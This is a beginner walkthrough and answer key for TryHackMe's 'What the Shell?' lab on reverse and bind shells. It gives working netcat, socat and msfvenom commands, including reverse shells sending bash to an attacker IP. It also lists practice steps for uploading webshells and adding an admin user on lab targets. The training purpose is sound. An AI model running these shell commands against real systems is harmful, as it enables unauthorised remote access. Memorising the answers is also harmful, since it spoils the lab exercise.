THM | What the Shell?
Shells and Privilege Escalation | What the Shell? | Summary:
This series of walkthroughs aims to help out complete beginners with finishing the Complete Beginner path on the TryHackMe website. It is based on the learning content provided in the What the Shell? room.
Disclaimer: Please note that this write-up is NOT intended to replace the original room or its content, but rather serve as supplementary material for those who are stuck and need additional guidance.
Task | 01 | What is a shell?
Question 1: Read and understand the introduction.
No answer needed
Task | 02 | Tools
Question 1: Read the above and check out the links!
No answer needed
Task | 03 | Types of Shell
Question 1: Which type of shell connects back to a listening port on your computer, Reverse (R) or Bind (B)?
R
Question 2: You have injected malicious shell code into a website. Is the shell you receive likely to be interactive? (Y or N)
N
Question 3: When using a bind shell, would you execute a listener on the Attacker (A) or the Target (T)?
T
Task | 04 | Netcat
Question 1: Which option tells netcat to listen?
-l
Question 2: How would you connect to a bind shell on the IP address: 10.10.10.11 with port 8080?
nc 10.10.10.11 8080
Task | 05 | Netcat Shell Stabilisation
Question 1: How would you change your terminal size to have 238 columns?
stty cols 238
Question 2: What is the syntax for setting up a Python3 webserver on port 80?
sudo python3 -m http.server 80
Task | 06 | Socat
Question 1: How would we get socat to listen on TCP port 8080?
TCP-L:8080
Task | 07 | Socat Encrypted Shells
Question 1: What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem"
socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0
Question 2: If your IP is 10.10.10.5, what syntax would you use to connect back to this listener?
socat OPENSSL:10.10.10.5:53,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane
Task | 08 | Common Shell Payloads
Question 1: What command can be used to create a named pipe in Linux?
mkfifo
Question 2: Look through the linked Payloads all the Things Reverse Shell Cheatsheet and familiarise yourself with the languages available.
No answer needed
Task | 09 | msfvenom
Question 1: Generate a staged reverse shell for a 64 bit Windows target, in a .exe format using your TryHackMe tun0 IP address and a chosen port.
No answer needed
Question 2: Which symbol is used to show that a shell is stageless?
_
Question 3: What command would you use to generate a staged meterpreter reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf and the output filename should be shell.
msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell lhost=10.10.10.5 lport=443
Task | 10 | Metasploit multi/handler
Question 1: What command can be used to start a listener in the background?
exploit -j
Question 2: If we had just received our tenth reverse shell in the current Metasploit session, what would be the command used to foreground it?
sessions 10
Task | 11 | WebShells
Question 1: Read the WebShells information.
No answer needed
Task | 12 | Next Steps
Question 1: Read the above information
No answer needed
Task | 13 | Practice and Examples
Question 1: Try uploading a webshell to the Linux box, then use the command: nc <LOCAL-IP> <PORT> -e /bin/bash to send a reverse shell back to a waiting listener on your own machine.
No answer needed
Question 2: Navigate to /usr/share/webshells/php/php-reverse-shell.php in Kali and change the IP and port to match your tun0 IP with a custom port. Set up a netcat listener, then upload and activate the shell.
No answer needed
Question 3: Log into the Linux machine over SSH using the credentials in task 14. Use the techniques in Task 8 to experiment with bind and reverse netcat shells.
No answer needed
Question 4: Practice reverse and bind shells using Socat on the Linux machine. Try both the normal and special techniques.
No answer needed
Question 5: Look through Payloads all the Things and try some of the other reverse shell techniques. Try to analyse them and see why they work.
No answer needed
Question 6: Switch to the Windows VM. Try uploading and activating the php-reverse-shell. Does this work?
No answer needed
Question 7: Upload a webshell on the Windows target and try to obtain a reverse shell using Powershell.
No answer needed
Question 8: The webserver is running with SYSTEM privileges. Create a new user and add it to the "administrators" group, then login over RDP or WinRM.
No answer needed
Question 9: Experiment using socat and netcat to obtain reverse and bind shells on the Windows Target.
No answer needed
Question 10: Create a 64bit Windows Meterpreter shell using msfvenom and upload it to the Windows Target. Activate the shell and catch it with multi/handler. Experiment with the features of this shell.
No answer needed
Question 11: Create both staged and stageless meterpreter shells for either target. Upload and manually activate them, catching the shell with netcat -- does this work?
No answer needed
Task | 14 | Linux Practice Box
Question 1: No Answer Required
No answer needed
Task | 15 | Windows Practice Box
Question 1: No answer required
No answer needed